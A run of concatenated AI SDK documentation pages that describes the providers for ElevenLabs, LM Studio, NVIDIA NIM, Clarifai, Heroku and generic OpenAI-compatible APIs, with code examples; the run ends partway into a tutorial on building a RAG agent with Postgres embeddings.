`kling-v1-i2v`	Original V1 model, end-frame and motion brush in std/pro

Motion Control

Model	Description
`kling-v3.0-motion-control`	Latest v3.0, enhanced facial consistency via element binding
`kling-v2.6-motion-control`	Transfers motion from a reference video to a character image

title: ElevenLabs description: Learn how to use the ElevenLabs provider for the AI SDK.

ElevenLabs Provider

The ElevenLabs provider contains language model support for the ElevenLabs transcription and speech generation APIs.

Setup

The ElevenLabs provider is available in the @ai-sdk/elevenlabs module. You can install it with

Provider Instance

You can import the default provider instance elevenlabs from @ai-sdk/elevenlabs:

import { elevenlabs } from '@ai-sdk/elevenlabs';

If you need a customized setup, you can import createElevenLabs from @ai-sdk/elevenlabs and create a provider instance with your settings:

import { createElevenLabs } from '@ai-sdk/elevenlabs';

const elevenlabs = createElevenLabs({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the ElevenLabs provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the ELEVENLABS_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Speech Models

You can create models that call the ElevenLabs speech API using the .speech() factory method.

The first argument is the model id e.g. eleven_multilingual_v2.

const model = elevenlabs.speech('eleven_multilingual_v2');

The voice argument can be set to a voice ID from the ElevenLabs Voice Library. You can find voice IDs by selecting a voice in the library and copying its ID.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { elevenlabs } from '@ai-sdk/elevenlabs';

const result = await generateSpeech({
  model: elevenlabs.speech('eleven_multilingual_v2'),
  text: 'Hello, world!',
  voice: '21m00Tcm4TlvDq8ikWAM', // Rachel voice
});

You can also pass additional provider-specific options using the providerOptions argument:

import { experimental_generateSpeech as generateSpeech } from 'ai';
import {
  elevenlabs,
  type ElevenLabsSpeechModelOptions,
} from '@ai-sdk/elevenlabs';

const result = await generateSpeech({
  model: elevenlabs.speech('eleven_multilingual_v2'),
  text: 'Hello, world!',
  voice: '21m00Tcm4TlvDq8ikWAM',
  providerOptions: {
    elevenlabs: {
      voiceSettings: {
        stability: 0.5,
        similarityBoost: 0.75,
      },
    } satisfies ElevenLabsSpeechModelOptions,
  },
});

languageCode string or null
Optional. Language code (ISO 639-1) used to enforce a language for the model. Currently, only Turbo v2.5 and Flash v2.5 support language enforcement. For other models, providing a language code will result in an error.
voiceSettings object or null
Optional. Voice settings that override stored settings for the given voice. These are applied only to the current request.
- stability double or null
  Optional. Determines how stable the voice is and the randomness between each generation. Lower values introduce broader emotional range; higher values result in a more monotonous voice.
- useSpeakerBoost boolean or null
  Optional. Boosts similarity to the original speaker. Increases computational load and latency.
- similarityBoost double or null
  Optional. Controls how closely the AI should adhere to the original voice.
- style double or null
  Optional. Amplifies the style of the original speaker. May increase latency if set above 0.
pronunciationDictionaryLocators array of objects or null
Optional. A list of pronunciation dictionary locators to apply to the text, in order. Up to 3 locators per request.
Each locator object:
- pronunciationDictionaryId string (required)
  The ID of the pronunciation dictionary.
- versionId string or null (optional)
  The version ID of the dictionary. If not provided, the latest version is used.
seed integer or null
Optional. If specified, the system will attempt to sample deterministically. Must be between 0 and 4294967295. Determinism is not guaranteed.
previousText string or null
Optional. The text that came before the current request's text. Can improve continuity when concatenating generations or influence current generation continuity.
nextText string or null
Optional. The text that comes after the current request's text. Can improve continuity when concatenating generations or influence current generation continuity.
previousRequestIds array of strings or null
Optional. List of request IDs for samples generated before this one. Improves continuity when splitting large tasks. Max 3 IDs. If both previousText and previousRequestIds are sent, previousText is ignored.
nextRequestIds array of strings or null
Optional. List of request IDs for samples generated after this one. Useful for maintaining continuity when regenerating a sample. Max 3 IDs. If both nextText and nextRequestIds are sent, nextText is ignored.
applyTextNormalization enum
Optional. Controls text normalization.
Allowed values: 'auto' (default), 'on', 'off'.
- 'auto': System decides whether to apply normalization (e.g., spelling out numbers).
- 'on': Always apply normalization.
- 'off': Never apply normalization.
  For eleven_turbo_v2_5 and eleven_flash_v2_5, can only be enabled with Enterprise plans.
applyLanguageTextNormalization boolean
Optional. Defaults to false. Controls language text normalization, which helps with proper pronunciation in some supported languages (currently only Japanese). May significantly increase latency.
enableLogging boolean
Optional. Whether to enable request logging for this API call. Defaults to the account-level setting.

Model Capabilities

Model	Instructions
`eleven_v3`
`eleven_multilingual_v2`
`eleven_flash_v2_5`
`eleven_flash_v2`
`eleven_turbo_v2_5`
`eleven_turbo_v2`
`eleven_monolingual_v1`
`eleven_multilingual_v1`

Transcription Models

You can create models that call the ElevenLabs transcription API using the .transcription() factory method.

The first argument is the model id e.g. scribe_v1.

const model = elevenlabs.transcription('scribe_v1');

import { experimental_transcribe as transcribe } from 'ai';
import {
  elevenlabs,
  type ElevenLabsTranscriptionModelOptions,
} from '@ai-sdk/elevenlabs';

const result = await transcribe({
  model: elevenlabs.transcription('scribe_v1'),
  audio: new Uint8Array([1, 2, 3, 4]),
  providerOptions: {
    elevenlabs: {
      languageCode: 'en',
    } satisfies ElevenLabsTranscriptionModelOptions,
  },
});

The following provider options are available:

languageCode string

An ISO-639-1 or ISO-639-3 language code corresponding to the language of the audio file. Can sometimes improve transcription performance if known beforehand. Defaults to null, in which case the language is predicted automatically.
tagAudioEvents boolean

Whether to tag audio events like (laughter), (footsteps), etc. in the transcription. Defaults to true.
numSpeakers integer

The maximum amount of speakers talking in the uploaded file. Can help with predicting who speaks when. The maximum amount of speakers that can be predicted is 32. Defaults to null, in which case the amount of speakers is set to the maximum value the model supports.
timestampsGranularity enum

The granularity of the timestamps in the transcription. Defaults to 'word'. Allowed values: 'none', 'word', 'character'.
diarize boolean

Whether to annotate which speaker is currently talking in the uploaded file. Defaults to true.
fileFormat enum

The format of input audio. Defaults to 'other'. Allowed values: 'pcm_s16le_16', 'other'. For 'pcm_s16le_16', the input audio must be 16-bit PCM at a 16kHz sample rate, single channel (mono), and little-endian byte order. Latency will be lower than with passing an encoded waveform.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`scribe_v1`
`scribe_v1_experimental`

title: LM Studio description: Use the LM Studio OpenAI compatible API with the AI SDK.

LM Studio Provider

LM Studio is a user interface for running local models.

It contains an OpenAI compatible API server that you can use with the AI SDK. You can start the local server under the Local Server tab in the LM Studio UI ("Start Server" button).

Setup

The LM Studio provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with

Provider Instance

To use LM Studio, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'http://localhost:1234/v1',
});

Language Models

You can interact with local LLMs in LM Studio using a provider instance. The first argument is the model id, e.g. llama-3.2-1b.

const model = lmstudio('llama-3.2-1b');

To be able to use a model, you need to download it first.

Example

You can use LM Studio language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'https://localhost:1234/v1',
});

const { text } = await generateText({
  model: lmstudio('llama-3.2-1b'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  maxRetries: 1, // immediately error if the server is not running
});

LM Studio language models can also be used with streamText.

Embedding Models

You can create models that call the LM Studio embeddings API using the .embeddingModel() factory method.

const model = lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5');

Example - Embedding a Single Value

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embed } from 'ai';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'https://localhost:1234/v1',
});

// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
  model: lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5'),
  value: 'sunny day at the beach',
});

Example - Embedding Many Values

When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).

The AI SDK provides the embedMany function for this purpose. Similar to embed, you can use it with embeddings models, e.g. lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5') or lmstudio.embeddingModel('text-embedding-bge-small-en-v1.5').

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embedMany } from 'ai';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'https://localhost:1234/v1',
});

// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
  model: lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5'),
  values: [
    'sunny day at the beach',
    'rainy afternoon in the city',
    'snowy night in the mountains',
  ],
});

title: NVIDIA NIM description: Use NVIDIA NIM OpenAI compatible API with the AI SDK.

NVIDIA NIM Provider

NVIDIA NIM provides optimized inference microservices for deploying foundation models. It offers an OpenAI-compatible API that you can use with the AI SDK.

Setup

The NVIDIA NIM provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with:

Provider Instance

To use NVIDIA NIM, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

Language Models

You can interact with NIM models using a provider instance. For example, to use DeepSeek-R1, a powerful open-source language model:

const model = nim.chatModel('deepseek-ai/deepseek-r1');

Example - Generate Text

You can use NIM language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

const { text, usage, finishReason } = await generateText({
  model: nim.chatModel('deepseek-ai/deepseek-r1'),
  prompt: 'Tell me the history of the San Francisco Mission-style burrito.',
});

console.log(text);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);

Example - Stream Text

NIM language models can also generate text in a streaming fashion with the streamText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

const result = streamText({
  model: nim.chatModel('deepseek-ai/deepseek-r1'),
  prompt: 'Tell me the history of the Northern White Rhino.',
});

for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}

console.log();
console.log('Token usage:', await result.usage);
console.log('Finish reason:', await result.finishReason);

NIM language models also support structured data generation with Output.

title: Clarifai description: Use Clarifai OpenAI compatible API with the AI SDK.

Clarifai Provider

Setup

The Clarifai provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with:

Provider Instance

To use Clarifai, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const clarifai = createOpenAICompatible({
  name: 'clarifai',
  baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
  apiKey: process.env.CLARIFAI_PAT,
});

New users can sign up for a free account on Clarifai to get started.

Language Models

You can interact with various large language models (LLMs) available on Clarifai using the provider instance. For example, to use DeepSeek-R1, a powerful open-source language model:

const model = clarifai.chatModel(
  'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);

Example - Generate Text

You can use Clarifai language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const clarifai = createOpenAICompatible({
  name: 'clarifai',
  baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
  apiKey: process.env.CLARIFAI_PAT,
});

const model = clarifai.chatModel(
  'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);

const { text, usage, finishReason } = await generateText({
  model,
  prompt: 'What is photosynthesis?',
});

console.log(text);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);

Example - Streaming Text

You can also stream text responses from Clarifai models using the streamText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';

const clarifai = createOpenAICompatible({
  name: 'clarifai',
  baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
  apiKey: process.env.CLARIFAI_PAT,
});

const model = clarifai.chatModel(
  'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);

const result = streamText({
  model,
  prompt: 'What is photosynthesis?',
});

for await (const message of result.textStream) {
  console.log(message);
}

For full list of available models, you can refer to the Clarifai Model Gallery.

title: Heroku description: Use a Heroku OpenAI compatible API with the AI SDK.

Heroku Provider

Setup

The Heroku provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with

Heroku Setup

Create a test app in Heroku:

heroku create

Inference using claude-3-5-haiku:

heroku ai:models:create -a $APP_NAME claude-3-5-haiku

Export Variables:

export INFERENCE_KEY=$(heroku config:get INFERENCE_KEY -a $APP_NAME)
export INFERENCE_MODEL_ID=$(heroku config:get INFERENCE_MODEL_ID -a $APP_NAME)
export INFERENCE_URL=$(heroku config:get INFERENCE_URL -a $APP_NAME)

Provider Instance

To use Heroku, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const heroku = createOpenAICompatible({
  name: 'heroku',
  baseURL: process.env.INFERENCE_URL + '/v1',
  apiKey: process.env.INFERENCE_KEY,
});

Be sure to have your INFERENCE_KEY, INFERENCE_MODEL_ID, and INFERENCE_URL set in your environment variables.

Language Models

You can create Heroku models using a provider instance. The first argument is the served model name, e.g. claude-3-5-haiku.

const model = heroku('claude-3-5-haiku');

Example

You can use Heroku language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const heroku = createOpenAICompatible({
  name: 'heroku',
  baseURL: process.env.INFERENCE_URL + '/v1',
  apiKey: process.env.INFERENCE_KEY,
});

const { text } = await generateText({
  model: heroku('claude-3-5-haiku'),
  prompt: 'Tell me about yourself in one sentence',
});

console.log(text);

Heroku language models are also able to generate text in a streaming fashion with the streamText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';

const heroku = createOpenAICompatible({
  name: 'heroku',
  baseURL: process.env.INFERENCE_URL + '/v1',
  apiKey: process.env.INFERENCE_KEY,
});

const result = streamText({
  model: heroku('claude-3-5-haiku'),
  prompt: 'Tell me about yourself in one sentence',
});

for await (const message of result.textStream) {
  console.log(message);
}

Heroku language models also support structured data generation with Output.

title: OpenAI Compatible Providers description: Use OpenAI compatible providers with the AI SDK.

OpenAI Compatible Providers

You can use the OpenAI Compatible Provider package to use language model providers that implement the OpenAI API.

Below we focus on the general setup and provider instance creation. You can also write a custom provider package leveraging the OpenAI Compatible package.

We provide detailed documentation for the following OpenAI compatible providers:

The general setup and provider instance creation is the same for all of these providers.

Setup

The OpenAI Compatible provider is available via the @ai-sdk/openai-compatible module. You can install it with:

Provider Instance

To use an OpenAI compatible provider, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
  includeUsage: true, // Include usage information in streaming responses
});

You can use the following optional settings to customize the provider instance:

baseURL string

Set the URL prefix for API calls.
apiKey string

API key for authenticating requests. If specified, adds an Authorization header to request headers with the value Bearer <apiKey>. This will be added before any headers potentially specified in the headers option.
headers Record<string,string>

Optional custom headers to include in requests. These will be added to request headers after any headers potentially added by use of the apiKey option.
queryParams Record<string,string>

Optional custom url query parameters to include in request urls.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
includeUsage boolean

Include usage information in streaming responses. When enabled, usage data will be included in the response metadata for streaming requests. Defaults to undefined (false).
supportsStructuredOutputs boolean

Set to true if the provider supports structured outputs. Only relevant for provider(), provider.chatModel(), and provider.languageModel().
transformRequestBody (args: Record<string, any>) => Record<string, any>

Optional function to transform the request body before sending it to the API. This is useful for proxy providers that may require a different request format than the official OpenAI API.
metadataExtractor MetadataExtractor

Optional metadata extractor to capture provider-specific metadata from API responses. See Custom Metadata Extraction for details.

Language Models

You can create provider models using a provider instance. The first argument is the model id, e.g. model-id.

const model = provider('model-id');

You can also use the following factory methods:

provider.languageModel('model-id') - creates a chat language model (same as provider('model-id'))
provider.chatModel('model-id') - creates a chat language model

Supported Capabilities

Chat models created with this provider support the following capabilities:

Text generation - Generate text completions
Streaming - Stream text responses in real-time
Tool calling - Call tools/functions with streaming support
Structured outputs - Generate JSON with schema validation (when supportsStructuredOutputs is enabled)
Reasoning content - Support for models that return reasoning/thinking tokens (e.g., DeepSeek R1)
System messages - Support for system prompts
Multi-modal inputs - Support for images and other content types (provider-dependent)

Example

You can use provider language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { text } = await generateText({
  model: provider('model-id'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Including model ids for auto-completion

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

type ExampleChatModelIds =
  | 'meta-llama/Llama-3-70b-chat-hf'
  | 'meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'
  | (string & {});

type ExampleCompletionModelIds =
  | 'codellama/CodeLlama-34b-Instruct-hf'
  | 'Qwen/Qwen2.5-Coder-32B-Instruct'
  | (string & {});

type ExampleEmbeddingModelIds =
  | 'BAAI/bge-large-en-v1.5'
  | 'bert-base-uncased'
  | (string & {});

type ExampleImageModelIds = 'dall-e-3' | 'stable-diffusion-xl' | (string & {});

const model = createOpenAICompatible<
  ExampleChatModelIds,
  ExampleCompletionModelIds,
  ExampleEmbeddingModelIds,
  ExampleImageModelIds
>({
  name: 'example',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.example.com/v1',
});

// Subsequent calls to e.g. `model.chatModel` will auto-complete the model id
// from the list of `ExampleChatModelIds` while still allowing free-form
// strings as well.

const { text } = await generateText({
  model: model.chatModel('meta-llama/Llama-3-70b-chat-hf'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Custom query parameters

Some providers may require custom query parameters. An example is the Azure AI Model Inference API which requires an api-version query parameter.

You can set these via the optional queryParams provider setting. These will be added to all requests made by the provider.

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
  queryParams: {
    'api-version': '1.0.0',
  },
});

For example, with the above configuration, API requests would include the query parameter in the URL like: https://api.provider.com/v1/chat/completions?api-version=1.0.0.

Image Models

You can create image models using the .imageModel() factory method:

const model = provider.imageModel('model-id');

Basic Image Generation

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateImage } from 'ai';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { images } = await generateImage({
  model: provider.imageModel('model-id'),
  prompt: 'A futuristic cityscape at sunset',
  size: '1024x1024',
});

Image Editing

The OpenAI Compatible provider supports image editing through the /images/edits endpoint. Pass input images via prompt.images to transform or edit existing images.

Basic Image Editing

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateImage } from 'ai';
import fs from 'fs';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const imageBuffer = fs.readFileSync('./input-image.png');

const { images } = await generateImage({
  model: provider.imageModel('model-id'),
  prompt: {
    text: 'Turn the cat into a dog but retain the style of the original image',
    images: [imageBuffer],
  },
});

Inpainting with Mask

Edit specific parts of an image using a mask:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateImage } from 'ai';
import fs from 'fs';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const image = fs.readFileSync('./input-image.png');
const mask = fs.readFileSync('./mask.png');

const { images } = await generateImage({
  model: provider.imageModel('model-id'),
  prompt: {
    text: 'A sunlit indoor lounge area with a pool containing a flamingo',
    images: [image],
    mask,
  },
});

Embedding Models

You can create embedding models using the .embeddingModel() factory method:

const model = provider.embeddingModel('model-id');

Example

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embed } from 'ai';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { embedding } = await embed({
  model: provider.embeddingModel('text-embedding-model'),
  value: 'The quick brown fox jumps over the lazy dog',
});

Embedding Model Options

The following provider options are available for embedding models via providerOptions:

dimensions number

The number of dimensions the resulting output embeddings should have. Only supported in models that allow dimension configuration.
user string

A unique identifier representing your end-user, which can help providers to monitor and detect abuse.

const { embedding } = await embed({
  model: provider.embeddingModel('text-embedding-model'),
  value: 'The quick brown fox jumps over the lazy dog',
  providerOptions: {
    providerName: {
      dimensions: 512,
      user: 'user-123',
    },
  },
});

Completion Models

You can create completion models (for text completion, not chat) using the .completionModel() factory method:

const model = provider.completionModel('model-id');

Example

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { text } = await generateText({
  model: provider.completionModel('completion-model-id'),
  prompt: 'The quick brown fox',
});

Completion Model Options

The following provider options are available for completion models via providerOptions:

echo boolean

Echo back the prompt in addition to the completion.
logitBias Record<string, number>

Modify the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID) to an associated bias value from -100 to 100.
suffix string

The suffix that comes after a completion of inserted text.
user string

A unique identifier representing your end-user, which can help providers to monitor and detect abuse.

const { text } = await generateText({
  model: provider.completionModel('completion-model-id'),
  prompt: 'The quick brown fox',
  providerOptions: {
    providerName: {
      echo: true,
      suffix: ' The end.',
      user: 'user-123',
    },
  },
});

Chat Model Options

The following provider options are available for chat models via providerOptions:

user string

A unique identifier representing your end-user, which can help the provider to monitor and detect abuse.
reasoningEffort string

Reasoning effort for reasoning models. The exact values depend on the provider.
textVerbosity string

Controls the verbosity of the generated text. The exact values depend on the provider.
strictJsonSchema boolean

Whether to use strict JSON schema validation. When true, the model uses constrained decoding to guarantee schema compliance. Only used when the provider supports structured outputs and a schema is provided. Defaults to true.

const { text } = await generateText({
  model: provider('model-id'),
  prompt: 'Solve this step by step: What is 15 * 23?',
  providerOptions: {
    providerName: {
      user: 'user-123',
      reasoningEffort: 'high',
    },
  },
});

Provider-specific options

The OpenAI Compatible provider supports adding provider-specific options to the request body. These are specified with the providerOptions field in the request body.

For example, if you create a provider instance with the name providerName, you can add a customOption field to the request body like this:

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { text } = await generateText({
  model: provider('model-id'),
  prompt: 'Hello',
  providerOptions: {
    providerName: { customOption: 'magic-value' },
  },
});

Note that the providerOptions key will be in camelCase. If you set the provider name to provider-name, the options still need to be set on providerOptions.providerName.

Custom Metadata Extraction

Working with providers that include non-standard response fields
Experimenting with beta or preview features
Capturing provider-specific metrics or debugging information
Supporting rapid provider API evolution without SDK changes

Metadata extractors work with both streaming and non-streaming chat completions and consist of two main components:

A function to extract metadata from complete responses
A streaming extractor that can accumulate metadata across chunks in a streaming response

Here's an example metadata extractor that captures both standard and custom provider data:

import { MetadataExtractor } from '@ai-sdk/openai-compatible';

const myMetadataExtractor: MetadataExtractor = {
  // Process complete, non-streaming responses
  extractMetadata: ({ parsedBody }) => {
    // You have access to the complete raw response
    // Extract any fields the provider includes
    return {
      myProvider: {
        standardUsage: parsedBody.usage,
        experimentalFeatures: parsedBody.beta_features,
        customMetrics: {
          processingTime: parsedBody.server_timing?.total_ms,
          modelVersion: parsedBody.model_version,
          // ... any other provider-specific data
        },
      },
    };
  },

  // Process streaming responses
  createStreamExtractor: () => {
    let accumulatedData = {
      timing: [],
      customFields: {},
    };

    return {
      // Process each chunk's raw data
      processChunk: parsedChunk => {
        if (parsedChunk.server_timing) {
          accumulatedData.timing.push(parsedChunk.server_timing);
        }
        if (parsedChunk.custom_data) {
          Object.assign(accumulatedData.customFields, parsedChunk.custom_data);
        }
      },
      // Build final metadata from accumulated data
      buildMetadata: () => ({
        myProvider: {
          streamTiming: accumulatedData.timing,
          customData: accumulatedData.customFields,
        },
      }),
    };
  },
};

You can provide a metadata extractor when creating your provider instance:

const provider = createOpenAICompatible({
  name: 'my-provider',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
  metadataExtractor: myMetadataExtractor,
});

The extracted metadata will be included in the response under the providerMetadata field:

const { text, providerMetadata } = await generateText({
  model: provider('model-id'),
  prompt: 'Hello',
});

console.log(providerMetadata.myProvider.customMetric);

This allows you to access provider-specific information while maintaining a consistent interface across different providers.

title: RAG Agent description: Learn how to build a RAG Agent with the AI SDK and Next.js tags: [ 'rag', 'chatbot', 'next', 'embeddings', 'database', 'retrieval', 'memory', 'agent', ]

RAG Agent Guide

In this guide, you will learn how to build a retrieval-augmented generation (RAG) agent.

Before we dive in, let's look at what RAG is, and why we would want to use it.

What is RAG?

RAG stands for retrieval augmented generation. In simple terms, RAG is the process of providing a Large Language Model (LLM) with specific information relevant to the prompt.

Why is RAG important?

To illustrate with a basic example, imagine asking the model for your favorite food:

**input**
What is my favorite food?

**generation**
I don't have access to personal information about individuals, including their
favorite foods.

Not surprisingly, the model doesn’t know. But imagine, alongside your prompt, the model received some extra context:

**input**
Respond to the user's prompt using only the provided context.
user prompt: 'What is my favorite food?'
context: user loves chicken nuggets

**generation**
Your favorite food is chicken nuggets!

Embedding

Chunking

All Together Now

By passing the appropriate context and refining the model’s objective, you are able to fully leverage its strengths as a reasoning machine.

Onto the project!

Project Setup

This project will use the following stack:

Clone Repo

To reduce the scope of this guide, you will be starting with a repository that already has a few things set up for you:

Drizzle ORM (lib/db) including an initial migration and a script to migrate (db:migrate)
a basic schema for the resources table (this will be for source material)
a Server Action for creating a resource

To get started, clone the starter repository with the following command:

First things first, run the following command to install the project’s dependencies:

Create Database

You will need a Postgres database to complete this tutorial. If you don't have Postgres setup on your local machine you can:

Create a free Postgres database with Vercel (recommended - see instructions below); or
Follow this guide to set it up locally

Setting up Postgres with Vercel

To set up a Postgres instance on your Vercel account:

Go to Vercel.com and make sure you're logged in
Navigate to your team homepage
Click on the Integrations tab
Click Browse Marketplace
Look for the Storage option in the sidebar
Select the Neon option (recommended, but any other PostgreSQL database provider should work)
Click Install, then click Install again in the top right corner
On the "Get Started with Neon" page, click Create Database on the right
Select your region (e.g., Washington, D.C., U.S. East)
Turn off Auth
Click Continue
Name your database (you can use the default name or rename it to something like "RagTutorial")
Click Create in the bottom right corner
After seeing "Database created successfully", click Done
You'll be redirected to your database instance
In the Quick Start section, click Show secrets
Copy the full DATABASE_URL environment variable

Migrate Database

Once you have a Postgres database, you need to add the connection string as an environment secret.

Make a copy of the .env.example file and rename it to .env.

Open the new .env file. You should see an item called DATABASE_URL. Copy in your database connection string after the equals sign.

With that set up, you can now run your first database migration. Run the following command:

Vercel AI Gateway Key

Now, open your .env file and add your API Gateway key:

AI_GATEWAY_API_KEY=your-api-key

Replace your-api-key with your actual Vercel AI Gateway API key.

Build

Let’s build a quick task list of what needs to be done:

Create a table in your database to store embeddings
Add logic to chunk and create embeddings when creating resources
Create an agent
Give the agent tools to query / create resources for it’s knowledge base

Create Embeddings Table

Create a new file (lib/db/schema/embeddings.ts) and add the following code:

import { nanoid } from '@/lib/utils';
import { index, pgTable, text, varchar, vector } from 'drizzle-orm/pg-core';
import { resources } from './resources';

export const embeddings = pgTable(
  'embeddings',
  {
    id: varchar('id', { length: 191 })
      .primaryKey()
      .$defaultFn(() => nanoid()),
    resourceId: varchar('resource_id', { length: 191 }).references(
      () => resources.id,
      { onDelete: 'cascade' },
    ),
    content: text('content').notNull(),
    embedding: vector('embedding', { dimensions: 1536 }).notNull(),
  },
  table => ({
    embeddingIndex: index('embeddingIndex').using(
      'hnsw',
      table.embedding.op('vector_cosine_ops'),
    ),
  }),
);

This table has four columns:

id - unique identifier
resourceId - a foreign key relation to the full source material
content - the plain text chunk
embedding - the vector representation of the plain text chunk

To perform similarity search, you also need to include an index (HNSW or IVFFlat) on this column for better performance.

To push this change to the database, run the following command:

Add Embedding Logic

Now that you have a table to store embeddings, it’s time to write the logic to create the embeddings.

Create a file with the following command:

Generate Chunks

const generateChunks = (input: string): string[] => {
  return input
    .trim()
    .split('.')
    .filter(i => i !== '');
};

Install AI SDK

You will use the AI SDK to create embeddings. This will require two more dependencies, which you can install by running the following command:

This will install the AI SDK and the AI SDK's React hooks.

Generate Embeddings

Let’s add a function to generate embeddings. Copy the following code into your lib/ai/embedding.ts file.

import { embedMany } from 'ai';

const embeddingModel = 'openai/text-embedding-ada-002';

